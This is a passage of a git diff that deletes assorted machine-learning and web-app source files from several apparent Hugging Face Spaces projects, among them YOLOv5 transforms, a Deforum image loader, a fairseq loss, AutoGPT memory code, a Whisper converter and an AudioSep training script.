LOGGER.info(f'{prefix}auto augmentations are currently not supported') - else: - if hflip > 0: - T += [A.HorizontalFlip(p=hflip)] - if vflip > 0: - T += [A.VerticalFlip(p=vflip)] - if jitter > 0: - color_jitter = (float(jitter),) * 3 # repeat value for brightness, contrast, satuaration, 0 hue - T += [A.ColorJitter(*color_jitter, 0)] - else: # Use fixed crop for eval set (reproducibility) - T = [A.SmallestMaxSize(max_size=size), A.CenterCrop(height=size, width=size)] - T += [A.Normalize(mean=mean, std=std), ToTensorV2()] # Normalize and convert to Tensor - LOGGER.info(prefix + ', '.join(f'{x}'.replace('always_apply=False, ', '') for x in T if x.p)) - return A.Compose(T) - - except ImportError: # package not installed, skip - LOGGER.warning(f'{prefix}⚠️ not found, install with `pip install albumentations` (recommended)') - except Exception as e: - LOGGER.info(f'{prefix}{e}') - - -def classify_transforms(size=224): - # Transforms to apply if albumentations not installed - assert isinstance(size, int), f'ERROR: classify_transforms size {size} must be integer, not (list, tuple)' - # T.Compose([T.ToTensor(), T.Resize(size), T.CenterCrop(size), T.Normalize(IMAGENET_MEAN, IMAGENET_STD)]) - return T.Compose([CenterCrop(size), ToTensor(), T.Normalize(IMAGENET_MEAN, IMAGENET_STD)]) - - -class LetterBox: - # YOLOv5 LetterBox class for image preprocessing, i.e. T.Compose([LetterBox(size), ToTensor()]) - def __init__(self, size=(640, 640), auto=False, stride=32): - super().__init__() - self.h, self.w = (size, size) if isinstance(size, int) else size - self.auto = auto # pass max size integer, automatically solve for short side using stride - self.stride = stride # used with auto - - def __call__(self, im): # im = np.array HWC - imh, imw = im.shape[:2] - r = min(self.h / imh, self.w / imw) # ratio of new/old - h, w = round(imh * r), round(imw * r) # resized image - hs, ws = (math.ceil(x / self.stride) * self.stride for x in (h, w)) if self.auto else self.h, self.w - top, left = round((hs - h) / 2 - 0.1), round((ws - w) / 2 - 0.1) - im_out = np.full((self.h, self.w, 3), 114, dtype=im.dtype) - im_out[top:top + h, left:left + w] = cv2.resize(im, (w, h), interpolation=cv2.INTER_LINEAR) - return im_out - - -class CenterCrop: - # YOLOv5 CenterCrop class for image preprocessing, i.e. T.Compose([CenterCrop(size), ToTensor()]) - def __init__(self, size=640): - super().__init__() - self.h, self.w = (size, size) if isinstance(size, int) else size - - def __call__(self, im): # im = np.array HWC - imh, imw = im.shape[:2] - m = min(imh, imw) # min dimension - top, left = (imh - m) // 2, (imw - m) // 2 - return cv2.resize(im[top:top + m, left:left + m], (self.w, self.h), interpolation=cv2.INTER_LINEAR) - - -class ToTensor: - # YOLOv5 ToTensor class for image preprocessing, i.e. T.Compose([LetterBox(size), ToTensor()]) - def __init__(self, half=False): - super().__init__() - self.half = half - - def __call__(self, im): # im = np.array HWC in BGR order - im = np.ascontiguousarray(im.transpose((2, 0, 1))[::-1]) # HWC to CHW -> BGR to RGB -> contiguous - im = torch.from_numpy(im) # to torch - im = im.half() if self.half else im.float() # uint8 to fp16/32 - im /= 255.0 # 0-255 to 0.0-1.0 - return im diff --git a/spaces/aodianyun/stable-diffusion-webui/extensions/deforum/scripts/deforum_helpers/load_images.py b/spaces/aodianyun/stable-diffusion-webui/extensions/deforum/scripts/deforum_helpers/load_images.py deleted file mode 100644 index 6dc5726f8aed86fb190ae15aa6098c3bcac8ec2c..0000000000000000000000000000000000000000 --- a/spaces/aodianyun/stable-diffusion-webui/extensions/deforum/scripts/deforum_helpers/load_images.py +++ /dev/null @@ -1,102 +0,0 @@ -import requests -import os -from PIL import Image, ImageOps -import cv2 -import numpy as np -import socket -import torchvision.transforms.functional as TF - -def load_img(path : str, shape=None, use_alpha_as_mask=False): - # use_alpha_as_mask: Read the alpha channel of the image as the mask image - image = load_image(path) - if use_alpha_as_mask: - image = image.convert('RGBA') - else: - image = image.convert('RGB') - - if shape is not None: - image = image.resize(shape, resample=Image.LANCZOS) - - mask_image = None - if use_alpha_as_mask: - # Split alpha channel into a mask_image - red, green, blue, alpha = Image.Image.split(image) - mask_image = alpha.convert('L') - image = image.convert('RGB') - - # check using init image alpha as mask if mask is not blank - extrema = mask_image.getextrema() - if (extrema == (0,0)) or extrema == (255,255): - print("use_alpha_as_mask==True: Using the alpha channel from the init image as a mask, but the alpha channel is blank.") - print("ignoring alpha as mask.") - mask_image = None - - return image, mask_image - -def load_image(image_path :str): - image = None - if image_path.startswith('http://') or image_path.startswith('https://'): - try: - host = socket.gethostbyname("www.google.com") - s = socket.create_connection((host, 80), 2) - s.close() - except: - raise ConnectionError("There is no active internet connection available - please use local masks and init files only.") - - try: - response = requests.get(image_path, stream=True) - except requests.exceptions.RequestException as e: - raise ConnectionError("Failed to download image due to no internet connection. Error: {}".format(e)) - if response.status_code == 404 or response.status_code != 200: - raise ConnectionError("Init image url or mask image url is not valid") - image = Image.open(response.raw).convert('RGB') - else: - if not os.path.exists(image_path): - raise RuntimeError("Init image path or mask image path is not valid") - image = Image.open(image_path).convert('RGB') - - return image - -def prepare_mask(mask_input, mask_shape, mask_brightness_adjust=1.0, mask_contrast_adjust=1.0): - """ - prepares mask for use in webui - """ - if isinstance(mask_input, Image.Image): - mask = mask_input - else : - mask = load_image(mask_input) - mask = mask.resize(mask_shape, resample=Image.LANCZOS) - if mask_brightness_adjust != 1: - mask = TF.adjust_brightness(mask, mask_brightness_adjust) - if mask_contrast_adjust != 1: - mask = TF.adjust_contrast(mask, mask_contrast_adjust) - mask = mask.convert('L') - return mask - -def check_mask_for_errors(mask_input, invert_mask=False): - extrema = mask_input.getextrema() - if (invert_mask): - if extrema == (255,255): - print("after inverting mask will be blank. ignoring mask") - return None - elif extrema == (0,0): - print("mask is blank. ignoring mask") - return None - else: - return mask_input - -def get_mask(args): - return check_mask_for_errors( - prepare_mask(args.mask_file, (args.W, args.H), args.mask_contrast_adjust, args.mask_brightness_adjust) - ) - -def get_mask_from_file(mask_file, args): - return check_mask_for_errors( - prepare_mask(mask_file, (args.W, args.H), args.mask_contrast_adjust, args.mask_brightness_adjust) - ) - -def blank_if_none(mask, w, h, mode): - return Image.new(mode, (w, h), (0)) if mask is None else mask - -def none_if_blank(mask): - return None if mask.getextrema() == (0,0) else mask diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/adodbapi/examples/xls_write.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/adodbapi/examples/xls_write.py deleted file mode 100644 index cedb1488ad8aaf2852602d8e03367ac6871b0901..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/adodbapi/examples/xls_write.py +++ /dev/null @@ -1,40 +0,0 @@ -import adodbapi -import datetime - -try: - import adodbapi.is64bit as is64bit - - is64 = is64bit.Python() -except ImportError: - is64 = False # in case the user has an old version of adodbapi -if is64: - driver = "Microsoft.ACE.OLEDB.12.0" -else: - driver = "Microsoft.Jet.OLEDB.4.0" -filename = "xx.xls" # file will be created if it does not exist -extended = 'Extended Properties="Excel 8.0;Readonly=False;"' - -constr = "Provider=%s;Data Source=%s;%s" % (driver, filename, extended) - -conn = adodbapi.connect(constr) -with conn: # will auto commit if no errors - with conn.cursor() as crsr: - try: - crsr.execute("drop table SheetOne") - except: - pass # just is case there is one already there - - # create the sheet and the header row and set the types for the columns - crsr.execute( - "create table SheetOne (Name varchar, Rank varchar, SrvcNum integer, Weight float, Birth date)" - ) - - sql = "INSERT INTO SheetOne (name, rank , srvcnum, weight, birth) values (?,?,?,?,?)" - - data = ("Mike Murphy", "SSG", 123456789, 167.8, datetime.date(1922, 12, 27)) - crsr.execute(sql, data) # write the first row of data - crsr.execute( - sql, ["John Jones", "Pvt", 987654321, 140.0, datetime.date(1921, 7, 4)] - ) # another row of data -conn.close() -print("Created spreadsheet=%s worksheet=%s" % (filename, "SheetOne")) diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/criterions/legacy_masked_lm.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/criterions/legacy_masked_lm.py deleted file mode 100644 index c70608c5a143b7b4fbd8c58dfcf9f873639d379c..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/criterions/legacy_masked_lm.py +++ /dev/null @@ -1,177 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math - -import torch -import torch.nn.functional as F -from fairseq import metrics, utils -from fairseq.criterions import FairseqCriterion, register_criterion - - -def compute_cross_entropy_loss(logits, targets, ignore_index=-100): - """ - Function to compute the cross entropy loss. The default value of - ignore_index is the same as the default value for F.cross_entropy in - pytorch. - """ - assert logits.size(0) == targets.size( - -1 - ), "Logits and Targets tensor shapes don't match up" - - loss = F.nll_loss( - F.log_softmax(logits, -1, dtype=torch.float32), - targets, - reduction="sum", - ignore_index=ignore_index, - ) - return loss - - -@register_criterion("legacy_masked_lm_loss") -class LegacyMaskedLmLoss(FairseqCriterion): - """ - Implementation for the loss used in masked language model (MLM) training. - This optionally also computes the next sentence prediction (NSP) loss and - adds it to the overall loss based on the specified args. There are three - cases to consider: - 1) Generic MLM training without NSP loss. In this case sentence_targets - and sentence_logits are both None. - 2) BERT training without NSP loss. In this case sentence_targets is - not None but sentence_logits is None and we should not be computing - a sentence level loss. - 3) BERT training with NSP loss. In this case both sentence_targets and - sentence_logits are not None and we should be computing a sentence - level loss. The weight of the sentence level loss is specified as - an argument. - """ - - def __init__(self, task, masked_lm_only, nsp_loss_weight): - super().__init__(task) - self.masked_lm_only = masked_lm_only - self.nsp_loss_weight = nsp_loss_weight - - @staticmethod - def add_args(parser): - """Args for MaskedLM Loss""" - # Default for masked_lm_only is False so as to not break BERT training - parser.add_argument( - "--masked-lm-only", - default=False, - action="store_true", - help="compute MLM loss only", - ) - parser.add_argument( - "--nsp-loss-weight", - default=1.0, - type=float, - help="weight for next sentence prediction" " loss (default 1)", - ) - - def forward(self, model, sample, reduce=True): - """Compute the loss for the given sample. - Returns a tuple with three elements: - 1) the loss - 2) the sample size, which is used as the denominator for the gradient - 3) logging outputs to display while training - """ - lm_logits, output_metadata = model(**sample["net_input"]) - - # reshape lm_logits from (N,T,C) to (N*T,C) - lm_logits = lm_logits.view(-1, lm_logits.size(-1)) - lm_targets = sample["lm_target"].view(-1) - lm_loss = compute_cross_entropy_loss(lm_logits, lm_targets, self.padding_idx) - - # compute the number of tokens for which loss is computed. This is used - # to normalize the loss - ntokens = utils.strip_pad(lm_targets, self.padding_idx).numel() - loss = lm_loss / ntokens - nsentences = sample["nsentences"] - # nsentences = 0 - - # Compute sentence loss if masked_lm_only is False - sentence_loss = None - if not self.masked_lm_only: - sentence_logits = output_metadata["sentence_logits"] - sentence_targets = sample["sentence_target"].view(-1) - # This needs to be recomputed due to some differences between - # TokenBlock and BlockPair dataset. This can be resolved with a - # refactor of BERTModel which we will do in the future. - # TODO: Remove this after refactor of BERTModel - nsentences = sentence_targets.size(0) - - # Check for logits being none which can happen when remove_heads - # is set to true in the BERT model. Ideally we should set - # masked_lm_only to true in this case, but that requires some - # refactor in the BERT model. - if sentence_logits is not None: - sentence_loss = compute_cross_entropy_loss( - sentence_logits, sentence_targets - ) - - loss += self.nsp_loss_weight * (sentence_loss / nsentences) - - # NOTE: as we are summing up per token mlm loss and per sentence nsp loss - # we don't need to use sample_size as denominator for the gradient - # here sample_size is just used for logging - sample_size = 1 - logging_output = { - "loss": utils.item(loss.data) if reduce else loss.data, - "lm_loss": utils.item(lm_loss.data) if reduce else lm_loss.data, - # sentence loss is not always computed - "sentence_loss": ( - (utils.item(sentence_loss.data) if reduce else sentence_loss.data) - if sentence_loss is not None - else 0.0 - ), - "ntokens": ntokens, - "nsentences": nsentences, - "sample_size": sample_size, - } - return loss, sample_size, logging_output - - @staticmethod - def reduce_metrics(logging_outputs) -> None: - """Aggregate logging outputs from data parallel training.""" - lm_loss_sum = sum(log.get("lm_loss", 0) for log in logging_outputs) - sentence_loss_sum = sum(log.get("sentence_loss", 0) for log in logging_outputs) - ntokens = sum(log.get("ntokens", 0) for log in logging_outputs) - nsentences = sum(log.get("nsentences", 0) for log in logging_outputs) - sample_size = sum(log.get("sample_size", 0) for log in logging_outputs) - agg_loss = sum(log.get("loss", 0) for log in logging_outputs) - - metrics.log_scalar( - "loss", - agg_loss / sample_size / math.log(2) if sample_size > 0 else 0.0, - sample_size, - round=3, - ) - metrics.log_scalar( - "lm_loss", - lm_loss_sum / ntokens / math.log(2) if ntokens > 0 else 0.0, - ntokens, - round=3, - ) - metrics.log_scalar( - "sentence_loss", - sentence_loss_sum / nsentences / math.log(2) if nsentences > 0 else 0.0, - nsentences, - round=3, - ) - metrics.log_scalar( - "nll_loss", - lm_loss_sum / ntokens / math.log(2) if ntokens > 0 else 0.0, - ntokens, - round=3, - ) - - @staticmethod - def logging_outputs_can_be_summed() -> bool: - """ - Whether the logging outputs returned by `forward` can be summed - across workers prior to calling `reduce_metrics`. Setting this - to True will improves distributed training speed. - """ - return True diff --git a/spaces/ashercn97/AsherTesting/css/chat.css b/spaces/ashercn97/AsherTesting/css/chat.css deleted file mode 100644 index 45a518bc56fcaae04ac73f6535c2349bf1f974fe..0000000000000000000000000000000000000000 --- a/spaces/ashercn97/AsherTesting/css/chat.css +++ /dev/null @@ -1,126 +0,0 @@ -.h-\[40vh\], .wrap.svelte-byatnx.svelte-byatnx.svelte-byatnx { - height: 66.67vh -} - -.gradio-container { - margin-left: auto !important; - margin-right: auto !important; -} - -.w-screen { - width: unset -} - -div.svelte-362y77>*, div.svelte-362y77>.form>* { - flex-wrap: nowrap -} - -/* fixes the API documentation in chat mode */ -.api-docs.svelte-1iguv9h.svelte-1iguv9h.svelte-1iguv9h { - display: grid; -} - -.pending.svelte-1ed2p3z { - opacity: 1; -} - -#extensions { - padding: 0; - padding: 0; -} - -#gradio-chatbot { - height: 66.67vh; -} - -.wrap.svelte-6roggh.svelte-6roggh { - max-height: 92.5%; -} - -/* This is for the microphone button in the whisper extension */ -.sm.svelte-1ipelgc { - width: 100%; -} - -#main button { - min-width: 0 !important; -} - -/*****************************************************/ -/*************** Chat box declarations ***************/ -/*****************************************************/ - -.chat { - margin-left: auto; - margin-right: auto; - max-width: 800px; - height: calc(100vh - 296px); - overflow-y: auto; - padding-right: 20px; - display: flex; - flex-direction: column-reverse; - word-break: break-word; - overflow-wrap: anywhere; - padding-top: 1px; -} - -.message-body li { - margin-top: 0.5em !important; - margin-bottom: 0.5em !important; -} - -.message-body li > p { - display: inline !important; -} - -.message-body ul, .message-body ol { - font-size: 15px !important; -} - -.message-body ul { - list-style-type: disc !important; -} - -.message-body pre { - margin-bottom: 1.25em !important; -} - -.message-body code { - white-space: pre-wrap !important; - word-wrap: break-word !important; -} - -.message-body :not(pre) > code { - white-space: normal !important; -} - -@media print { - body { - visibility: hidden; - } - - .chat { - visibility: visible; - position: absolute; - left: 0; - top: 0; - max-width: none; - max-height: none; - width: 100%; - height: fit-content; - display: flex; - flex-direction: column-reverse; - } - - .message { - break-inside: avoid; - } - - .gradio-container { - overflow: visible; - } - - .tab-nav { - display: none !important; - } -} diff --git a/spaces/avivdm1/AutoGPT/autogpt/memory/base.py b/spaces/avivdm1/AutoGPT/autogpt/memory/base.py deleted file mode 100644 index 691e2299c4caa5c2e9af5b2436727834f3cc6c67..0000000000000000000000000000000000000000 --- a/spaces/avivdm1/AutoGPT/autogpt/memory/base.py +++ /dev/null @@ -1,43 +0,0 @@ -"""Base class for memory providers.""" -import abc - -import openai - -from autogpt.config import AbstractSingleton, Config - -cfg = Config() - - -def get_ada_embedding(text): - text = text.replace("\n", " ") - if cfg.use_azure: - return openai.Embedding.create( - input=[text], - engine=cfg.get_azure_deployment_id_for_model("text-embedding-ada-002"), - )["data"][0]["embedding"] - else: - return openai.Embedding.create(input=[text], model="text-embedding-ada-002")[ - "data" - ][0]["embedding"] - - -class MemoryProviderSingleton(AbstractSingleton): - @abc.abstractmethod - def add(self, data): - pass - - @abc.abstractmethod - def get(self, data): - pass - - @abc.abstractmethod - def clear(self): - pass - - @abc.abstractmethod - def get_relevant(self, data, num_relevant=5): - pass - - @abc.abstractmethod - def get_stats(self): - pass diff --git a/spaces/awaawawawa/iurf7irfuyytruyyugb/prune.py b/spaces/awaawawawa/iurf7irfuyytruyyugb/prune.py deleted file mode 100644 index ef1d2364b5e15611cc13da0d3d5cdda3eae19f45..0000000000000000000000000000000000000000 --- a/spaces/awaawawawa/iurf7irfuyytruyyugb/prune.py +++ /dev/null @@ -1,56 +0,0 @@ -import os -from pathlib import Path -import torch -import argparse -parser = argparse.ArgumentParser() -args = parser.parse_args() - - -def prune_it(p, keep_only_ema=True): - print(f"prunin' in path: {p}") - size_initial = os.path.getsize(p) - nsd = dict() - sd = torch.load(p, map_location="cpu") - print(sd.keys()) - for k in sd.keys(): - if k != "optimizer_states": - nsd[k] = sd[k] - else: - print(f"removing optimizer states for path {p}") - if "global_step" in sd: - print(f"This is global step {sd['global_step']}.") - if keep_only_ema: - sd = nsd["state_dict"].copy() - # infer ema keys - ema_keys = {k: "model_ema." + k[6:].replace(".", "") for k in sd.keys() if k.startswith('model.')} - new_sd = dict() - - for k in sd: - if k in ema_keys: - print(k, ema_keys[k]) - new_sd[k] = sd[ema_keys[k]] - elif not k.startswith("model_ema.") or k in ["model_ema.num_updates", "model_ema.decay"]: - new_sd[k] = sd[k] - - assert len(new_sd) == len(sd) - len(ema_keys) - nsd["state_dict"] = new_sd - else: - sd = nsd['state_dict'].copy() - new_sd = dict() - for k in sd: - new_sd[k] = sd[k] - nsd['state_dict'] = new_sd - - fn = f"{os.path.splitext(p)[0]}-pruned.ckpt" if not keep_only_ema else f"{os.path.splitext(p)[0]}-ema-pruned.ckpt" - print(f"saving pruned checkpoint at: {fn}") - torch.save(nsd, fn) - newsize = os.path.getsize(fn) - MSG = f"New ckpt size: {newsize*1e-9:.2f} GB. " + \ - f"Saved {(size_initial - newsize)*1e-9:.2f} GB by removing optimizer states" - if keep_only_ema: - MSG += " and non-EMA weights" - print(MSG) - - -if __name__ == "__main__": - prune_it('wd-v1-2-full-ema.ckpt') diff --git a/spaces/awacke1/Spending-Simulation/backupapp.py b/spaces/awacke1/Spending-Simulation/backupapp.py deleted file mode 100644 index 27d1dfd3e618420815492f6034705ed5557e56aa..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Spending-Simulation/backupapp.py +++ /dev/null @@ -1,71 +0,0 @@ -import streamlit as st -import csv -import base64 - -# Define the state populations and family sizes -state_data = { - 'California': {'population': 39538223, 'family_size': 3.3}, - 'Texas': {'population': 29145505, 'family_size': 3.4}, - 'Florida': {'population': 21538187, 'family_size': 3.0}, - 'New York': {'population': 19849399, 'family_size': 3.1}, - 'Minnesota': {'population': 5700671, 'family_size': 2.5}, - 'Wisconsin': {'population': 5897473, 'family_size': 2.6}, -} - -# Define the state spending data -spending_data = { - 'California': {'education': 2500, 'healthcare': 3000, 'transportation': 1500}, - 'Texas': {'education': 2000, 'healthcare': 2500, 'transportation': 1000}, - 'Florida': {'education': 1500, 'healthcare': 2000, 'transportation': 750}, - 'New York': {'education': 3000, 'healthcare': 3500, 'transportation': 2000}, - 'Minnesota': {'education': 1000, 'healthcare': 1500, 'transportation': 500}, - 'Wisconsin': {'education': 1250, 'healthcare': 1750, 'transportation': 750}, -} - -# Define the emoji icons -POPULATION_ICON = '👥' -FAMILY_SIZE_ICON = '👨‍👩‍👧‍👦' -EDUCATION_ICON = '🏫' -HEALTHCARE_ICON = '🏥' -TRANSPORTATION_ICON = '🚗' - -def main(): - st.title('State Comparison') - - # Consolidate the state data and spending data into a list of dictionaries - state_list = [] - for state, data in state_data.items(): - state_dict = { - 'state': state, - 'population': data['population'], - 'family_size': data['family_size'], - 'education_spending': spending_data[state]['education'], - 'healthcare_spending': spending_data[state]['healthcare'], - 'transportation_spending': spending_data[state]['transportation'] - } - state_list.append(state_dict) - - # Save the data to a CSV file and provide a download link - with open('state_data.csv', mode='w', newline='') as file: - writer = csv.DictWriter(file, fieldnames=['state', 'population', 'family_size', 'education_spending', 'healthcare_spending', 'transportation_spending']) - writer.writeheader() - for state in state_list: - writer.writerow(state) - with open('state_data.csv', mode='rb') as file: - b64 = base64.b64encode(file.read()).decode('utf-8') - st.markdown(f'Download State Data CSV File', unsafe_allow_html=True) - - # Display state populations and family sizes - st.header('Population and Family Size') - for state, data in state_data.items(): - st.subheader(f'{POPULATION_ICON} {state}') - st.write(f'Population: {data["population"]}') - st.write(f'Family Size: {data["family_size"]}') - -# Display state spending data -st.header('State Spending') -for state, data in spending_data.items(): - st.subheader(state) - st.write(f'{EDUCATION_ICON} Education: {data["education"]}') - st.write(f'{HEALTHCARE_ICON} Healthcare: {data["healthcare"]}') - st.write(f'{TRANSPORTATION_ICON} Transportation: {data["transportation"]}') \ No newline at end of file diff --git a/spaces/ayaanzaveri/whisper-webui/src/conversion/hf_converter.py b/spaces/ayaanzaveri/whisper-webui/src/conversion/hf_converter.py deleted file mode 100644 index a86b5c2f7eb1b1ef60340533c62acd8c109af7b8..0000000000000000000000000000000000000000 --- a/spaces/ayaanzaveri/whisper-webui/src/conversion/hf_converter.py +++ /dev/null @@ -1,67 +0,0 @@ -# https://github.com/bayartsogt-ya/whisper-multiple-hf-datasets - -from copy import deepcopy -import torch -from transformers import WhisperForConditionalGeneration - -WHISPER_MAPPING = { - "layers": "blocks", - "fc1": "mlp.0", - "fc2": "mlp.2", - "final_layer_norm": "mlp_ln", - "layers": "blocks", - ".self_attn.q_proj": ".attn.query", - ".self_attn.k_proj": ".attn.key", - ".self_attn.v_proj": ".attn.value", - ".self_attn_layer_norm": ".attn_ln", - ".self_attn.out_proj": ".attn.out", - ".encoder_attn.q_proj": ".cross_attn.query", - ".encoder_attn.k_proj": ".cross_attn.key", - ".encoder_attn.v_proj": ".cross_attn.value", - ".encoder_attn_layer_norm": ".cross_attn_ln", - ".encoder_attn.out_proj": ".cross_attn.out", - "decoder.layer_norm.": "decoder.ln.", - "encoder.layer_norm.": "encoder.ln_post.", - "embed_tokens": "token_embedding", - "encoder.embed_positions.weight": "encoder.positional_embedding", - "decoder.embed_positions.weight": "decoder.positional_embedding", - "layer_norm": "ln_post", -} - - -def rename_keys(s_dict): - keys = list(s_dict.keys()) - for key in keys: - new_key = key - for k, v in WHISPER_MAPPING.items(): - if k in key: - new_key = new_key.replace(k, v) - - print(f"{key} -> {new_key}") - - s_dict[new_key] = s_dict.pop(key) - return s_dict - - -def convert_hf_whisper(hf_model_name_or_path: str, whisper_state_path: str): - transformer_model = WhisperForConditionalGeneration.from_pretrained(hf_model_name_or_path) - config = transformer_model.config - - # first build dims - dims = { - 'n_mels': config.num_mel_bins, - 'n_vocab': config.vocab_size, - 'n_audio_ctx': config.max_source_positions, - 'n_audio_state': config.d_model, - 'n_audio_head': config.encoder_attention_heads, - 'n_audio_layer': config.encoder_layers, - 'n_text_ctx': config.max_target_positions, - 'n_text_state': config.d_model, - 'n_text_head': config.decoder_attention_heads, - 'n_text_layer': config.decoder_layers - } - - state_dict = deepcopy(transformer_model.model.state_dict()) - state_dict = rename_keys(state_dict) - - torch.save({"dims": dims, "model_state_dict": state_dict}, whisper_state_path) \ No newline at end of file diff --git a/spaces/badayvedat/AudioSep/train.py b/spaces/badayvedat/AudioSep/train.py deleted file mode 100644 index acde85b20c7e1abd4b5f8fc732470a80c8428d82..0000000000000000000000000000000000000000 --- a/spaces/badayvedat/AudioSep/train.py +++ /dev/null @@ -1,307 +0,0 @@ -import argparse -import logging -import os -import pathlib -from typing import List, NoReturn -import lightning.pytorch as pl -from lightning.pytorch.strategies import DDPStrategy -from torch.utils.tensorboard import SummaryWriter -from data.datamodules import * -from utils import create_logging, parse_yaml -from models.resunet import * -from losses import get_loss_function -from models.audiosep import AudioSep, get_model_class -from data.waveform_mixers import SegmentMixer -from models.clap_encoder import CLAP_Encoder -from callbacks.base import CheckpointEveryNSteps -from optimizers.lr_schedulers import get_lr_lambda - - -def get_dirs( - workspace: str, - filename: str, - config_yaml: str, - devices_num: int -) -> List[str]: - r"""Get directories and paths. - - Args: - workspace (str): directory of workspace - filename (str): filename of current .py file. - config_yaml (str): config yaml path - devices_num (int): 0 for cpu and 8 for training with 8 GPUs - - Returns: - checkpoints_dir (str): directory to save checkpoints - logs_dir (str), directory to save logs - tf_logs_dir (str), directory to save TensorBoard logs - statistics_path (str), directory to save statistics - """ - - os.makedirs(workspace, exist_ok=True) - - yaml_name = pathlib.Path(config_yaml).stem - - # Directory to save checkpoints - checkpoints_dir = os.path.join( - workspace, - "checkpoints", - filename, - "{},devices={}".format(yaml_name, devices_num), - ) - os.makedirs(checkpoints_dir, exist_ok=True) - - # Directory to save logs - logs_dir = os.path.join( - workspace, - "logs", - filename, - "{},devices={}".format(yaml_name, devices_num), - ) - os.makedirs(logs_dir, exist_ok=True) - - # Directory to save TensorBoard logs - create_logging(logs_dir, filemode="w") - logging.info(args) - - tf_logs_dir = os.path.join( - workspace, - "tf_logs", - filename, - "{},devices={}".format(yaml_name, devices_num), - ) - - # Directory to save statistics - statistics_path = os.path.join( - workspace, - "statistics", - filename, - "{},devices={}".format(yaml_name, devices_num), - "statistics.pkl", - ) - os.makedirs(os.path.dirname(statistics_path), exist_ok=True) - - return checkpoints_dir, logs_dir, tf_logs_dir, statistics_path - - -def get_data_module( - config_yaml: str, - num_workers: int, - batch_size: int, -) -> DataModule: - r"""Create data_module. Mini-batch data can be obtained by: - - code-block:: python - - data_module.setup() - - for batch_data_dict in data_module.train_dataloader(): - print(batch_data_dict.keys()) - break - - Args: - workspace: str - config_yaml: str - num_workers: int, e.g., 0 for non-parallel and 8 for using cpu cores - for preparing data in parallel - distributed: bool - - Returns: - data_module: DataModule - """ - - # read configurations - configs = parse_yaml(config_yaml) - sampling_rate = configs['data']['sampling_rate'] - segment_seconds = configs['data']['segment_seconds'] - - # audio-text datasets - datafiles = configs['data']['datafiles'] - - # dataset - dataset = AudioTextDataset( - datafiles=datafiles, - sampling_rate=sampling_rate, - max_clip_len=segment_seconds, - ) - - - # data module - data_module = DataModule( - train_dataset=dataset, - num_workers=num_workers, - batch_size=batch_size - ) - - return data_module - - -def train(args) -> NoReturn: - r"""Train, evaluate, and save checkpoints. - - Args: - workspace: str, directory of workspace - gpus: int, number of GPUs to train - config_yaml: str - """ - - # arguments & parameters - workspace = args.workspace - config_yaml = args.config_yaml - filename = args.filename - - devices_num = torch.cuda.device_count() - # Read config file. - configs = parse_yaml(config_yaml) - - # Configuration of data - max_mix_num = configs['data']['max_mix_num'] - sampling_rate = configs['data']['sampling_rate'] - lower_db = configs['data']['loudness_norm']['lower_db'] - higher_db = configs['data']['loudness_norm']['higher_db'] - - # Configuration of the separation model - query_net = configs['model']['query_net'] - model_type = configs['model']['model_type'] - input_channels = configs['model']['input_channels'] - output_channels = configs['model']['output_channels'] - condition_size = configs['model']['condition_size'] - use_text_ratio = configs['model']['use_text_ratio'] - - # Configuration of the trainer - num_nodes = configs['train']['num_nodes'] - batch_size = configs['train']['batch_size_per_device'] - sync_batchnorm = configs['train']['sync_batchnorm'] - num_workers = configs['train']['num_workers'] - loss_type = configs['train']['loss_type'] - optimizer_type = configs["train"]["optimizer"]["optimizer_type"] - learning_rate = float(configs['train']["optimizer"]['learning_rate']) - lr_lambda_type = configs['train']["optimizer"]['lr_lambda_type'] - warm_up_steps = configs['train']["optimizer"]['warm_up_steps'] - reduce_lr_steps = configs['train']["optimizer"]['reduce_lr_steps'] - save_step_frequency = configs['train']['save_step_frequency'] - resume_checkpoint_path = args.resume_checkpoint_path - if resume_checkpoint_path == "": - resume_checkpoint_path = None - else: - logging.info(f'Finetuning AudioSep with checkpoint [{resume_checkpoint_path}]') - - # Get directories and paths - checkpoints_dir, logs_dir, tf_logs_dir, statistics_path = get_dirs( - workspace, filename, config_yaml, devices_num, - ) - - logging.info(configs) - - # data module - data_module = get_data_module( - config_yaml=config_yaml, - batch_size=batch_size, - num_workers=num_workers, - ) - - # model - Model = get_model_class(model_type=model_type) - - ss_model = Model( - input_channels=input_channels, - output_channels=output_channels, - condition_size=condition_size, - ) - - # loss function - loss_function = get_loss_function(loss_type) - - segment_mixer = SegmentMixer( - max_mix_num=max_mix_num, - lower_db=lower_db, - higher_db=higher_db - ) - - - if query_net == 'CLAP': - query_encoder = CLAP_Encoder() - else: - raise NotImplementedError - - lr_lambda_func = get_lr_lambda( - lr_lambda_type=lr_lambda_type, - warm_up_steps=warm_up_steps, - reduce_lr_steps=reduce_lr_steps, - ) - - # pytorch-lightning model - pl_model = AudioSep( - ss_model=ss_model, - waveform_mixer=segment_mixer, - query_encoder=query_encoder, - loss_function=loss_function, - optimizer_type=optimizer_type, - learning_rate=learning_rate, - lr_lambda_func=lr_lambda_func, - use_text_ratio=use_text_ratio - ) - - checkpoint_every_n_steps = CheckpointEveryNSteps( - checkpoints_dir=checkpoints_dir, - save_step_frequency=save_step_frequency, - ) - - summary_writer = SummaryWriter(log_dir=tf_logs_dir) - - callbacks = [checkpoint_every_n_steps] - - trainer = pl.Trainer( - accelerator='auto', - devices='auto', - strategy='ddp_find_unused_parameters_true', - num_nodes=num_nodes, - precision="32-true", - logger=None, - callbacks=callbacks, - fast_dev_run=False, - max_epochs=-1, - log_every_n_steps=50, - use_distributed_sampler=True, - sync_batchnorm=sync_batchnorm, - num_sanity_val_steps=2, - enable_checkpointing=False, - enable_progress_bar=True, - enable_model_summary=True, - ) - - # Fit, evaluate, and save checkpoints. - trainer.fit( - model=pl_model, - train_dataloaders=None, - val_dataloaders=None, - datamodule=data_module, - ckpt_path=resume_checkpoint_path, - ) - - -if __name__ == "__main__": - - parser = 